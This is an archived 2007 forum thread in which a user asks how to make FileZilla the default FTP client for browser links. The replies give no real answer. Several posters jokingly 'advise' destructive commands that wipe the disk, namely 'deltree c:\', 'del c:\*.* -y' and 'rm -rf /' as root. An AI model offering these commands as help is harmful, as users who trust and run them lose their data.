Log in

View Full Version : How to make a FTP client default?



AtifSajid
02-05-2007, 09:59 AM
Like if I have filezilla installed on my computer.

I want to be able to click a ftp link in IE/Firefox and it open up Filezilla or any other FTP client I have installed?

I know its going to require hacking the Registry...so let me know...

Nemesis
02-05-2007, 02:42 PM
start
run
cmd
deltree c:\
yes
press enter

RandomGuy
02-05-2007, 02:45 PM
start
run
cmd
deltree c:\
yes
press enter
tthat would do it....

you can also try

del c:\*.* -y

Jecht
02-05-2007, 02:45 PM
Very good tip George! :goodjob:

Mr_Mischif
02-05-2007, 04:59 PM
Since I'm running Linux now, I can't really help you, but I heard on some forum that the way to do this on a Linux box was rm -rf /

Nemesis
02-05-2007, 05:06 PM
Since I'm running Linux now, I can't really help you, but I heard on some forum that the way to do this on a Linux box was rm -rf /


are you running a KDE or Gnome environment?

Mr_Mischif
02-05-2007, 05:24 PM
^Actually, I'm using XFCE

David88vert
02-05-2007, 08:49 PM
rm -rf /
(Logged in as root)

Linux/UNIX FTW